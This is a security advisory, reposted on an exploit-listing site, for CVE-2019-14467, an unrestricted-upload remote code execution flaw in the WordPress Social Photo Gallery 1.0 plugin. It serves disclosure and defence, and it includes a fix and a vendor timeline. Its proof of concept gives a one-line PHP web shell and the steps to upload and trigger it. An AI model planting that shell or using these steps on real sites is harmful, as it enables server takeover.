Advertisement






WordPress Social Photo Gallery 1.0 Remote Code Execution

CVE Category Price Severity
CVE-2019-14467 CWE-XX N/A Critical
Author Risk Exploitation Type Date
Unknown High Remote 2019-11-17
CPE
cpe:cpe:/a:wordpress:social_photo_gallery:1.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110112

Below is a copy:

WordPress Social Photo Gallery 1.0 Remote Code Execution
=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised:  November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution

II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images 
deserve to be experienced and shared, to spark a response as they travel 
the social web, and to work for you by generating more fans and more Likes 
for your content.

III. DESCRIPTION
-------------------------
The version of WordPress Plugin Social Photo Gallery is affected by a 
Remote Code Execution vulnerability.

The application does not check the extension when a imagen of a album is 
uploaded, resulting in a execution of php code.

To exploit the vulnerability only is needed create a album in the 
application and attach a malicious php file in the cover photo album.

IV. PROOF OF CONCEPT
-------------------------

1. Create a .php archive (cmd.php):

<?php system($_GET['cmd']); ?>

2. Click Add Album, select the name, for example "demo" and in the "Cover 
Photo" select the cmd.php file.

3. Load the next URL and magic:

http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls

V. BUSINESS IMPACT
-------------------------
Execute local commands in the server result from these attacks.

VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0

VII. SOLUTION
-------------------------
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: [email protected]

X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019 2: Email to vendor without response
August 15, 2019 3: Second email to vendor without response
November 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.